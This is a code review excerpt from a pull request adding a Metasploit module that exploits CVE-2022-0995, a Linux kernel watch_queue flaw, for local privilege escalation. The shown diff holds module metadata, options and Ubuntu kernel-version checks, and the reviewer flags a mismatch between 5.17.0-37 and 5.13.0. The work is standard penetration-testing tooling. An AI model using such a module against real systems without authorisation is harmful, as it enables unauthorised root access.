modules/exploits/linux/local/cve_2022_0995_watch_queue.rb

```diff
@@ -0,0 +1,159 @@
+          out-of-bounds write in kernel memory. The exploit fails occasionally, but it does not crash the target and can be run
+          multiple times until privilege escalation is achieved.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bonfee',     # PoC
+          'bwatters-r7' # Aka @tychos_moose, Metasploit Module
+        ],
+        'DisclosureDate' => '2022-03-14',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2022-0995' ],
+          [ 'URL', 'https://github.com/Bonfee/CVE-2022-0995' ],
+          [ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=93ce93587d36493f2f86921fa79921b3cba63fbb' ],
+          [ 'URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0995' ]
+        ],
+        'Targets' => [
+          [ 'Ubuntu Linux 5.17.0-37', {} ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_OS_RESTARTS ], # In practice haven't seen this happen but there is a small potential for a kernel panic here.
+          'SideEffects' => [ ARTIFACTS_ON_DISK ]
+        }
+      )
+    )
+    register_options [
+      OptBool.new('DEBUG_SOURCE', [ false, 'Use source code with debug prints to help troubleshoot', false ])
+    ]
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ]
+  end
+
+  def pull_version
+    version_array = kernel_release.split('-')
+    if version_array.length < 2
+      fail_with(Failure::UnexpectedReply, 'The target does not have the expected kernel version format!')
+    end
+    vprint_status("Version array: #{version_array}")
+    major_version = Rex::Version.new(version_array[0])
+    vprint_status("major_version: #{major_version}")
+    minor_version = version_array[1]
+    vprint_status("minor_version: #{minor_version}")
+    return [major_version, minor_version]
+  end
+
+  def module_check
+    # Vulnerable versions are under 5.17:rc8
+    # This module only has offsets for Ubuntu 5.17.0-37
+    unless kernel_version =~ /[uU]buntu/
+      fail_with(Failure::NoTarget, "Unsupported Distro: '#{version}'")
+    end
+    arch = kernel_hardware
+    unless arch.include?('x86_64')
+      fail_with(Failure::NoTarget, "Unsupported architecture: '#{arch}'")
+    end
+    major_version, minor_version = pull_version
+    vulnerable_version = Rex::Version.new('5.13.0')
+    unless major_version == vulnerable_version && minor_version == '37'
+      fail_with(Failure::NoTarget, "No offsets for '#{kernel_release}'")
+    end
+  end
+
+  def check
+    # Vulnerable versions are under 5.17:rc8
+    # This module only has offsets for 5.17.0-37
```

Comment:
```suggestion
    # This module only has offsets for 5.13.0-37
```

Reply:
Bump

Reply:
Resolved in https://github.com/rapid7/metasploit-framework/pull/16422/commits/78d4ac85926baee5d9cd4e6cd67415a8d3d8858f